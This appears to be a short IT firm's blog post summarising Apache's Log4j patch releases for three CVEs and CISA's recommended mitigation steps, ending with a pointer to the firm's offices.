Cybersecurity experts are playing wack-a-mole with the Log4j bug
Since the Apache Log4j bug was discovered, things have not been going well for cybersecurity experts. Experts found two additional vulnerabilities since the release of the first patch.
Last week, CISA released an emergency directive to all federal civilian departments and agencies to mitigate Apache log4j and patch vulnerabilities immediately.
Here’s what has been implemented so far:
- December 10, Apache released Log4j 2.15.0 for Java 8 users to address a remote code execution (RCE) vulnerability—CVE-2021-44228.
- December 13, Apache released Log4j 2.12.2 for Java 7 users and Log4j 2.16.0 for Java 8 users to address a RCE vulnerability—CVE-2021-45046.
- December 17, Apache released Log4j 2.17.0 for Java 8 users to address a denial-of-service (DOS) vulnerability—CVE-2021-45105.
Apache said patch versions 2.0-2.16 did not protect from uncontrolled recursion from self-referential lookups. The vulnerability from 2.16 was labeled highly vulnerable to CVE-2021-45105 and given a CVSS score of 7.5.
What many cybersecurity experts have discovered is this vulnerability goes below surface level, which means a single step will not rectify the problem. Most companies affected by this vulnerability go at least 5 levels down, with some as severe as 9. The deeper the dependency, the more steps it will take to be fixed, says Google’s Open Source Insights Team members James Wetter and Nicky Ringland.
Apache is focused on the 2.17.0 patch. This patch will replace Context lookups with Thread Context Map patterns in PatternLayout within the logging configurations. CISA also recommends downloading the patch, as well as doing the following tasks :
- Discover all internet-facing assets that allow data inputs and use Log4j Java library anywhere in the stack.
- Discover all assets that use the Log4j library.
- Update or isolate affected assets. Assume compromise, identify common post-exploit sources and activity, and hunt for signs of malicious activity.
- Monitor for odd traffic patterns (e.g., JNDI LDAP/RMI outbound traffic, DMZ systems initiating outbound connections).
To learn more about the Log4j vulnerablity, please visit Cynet, and for more information about our plans to protect you from further vulnerability, please contact our Vancouver or Austin office.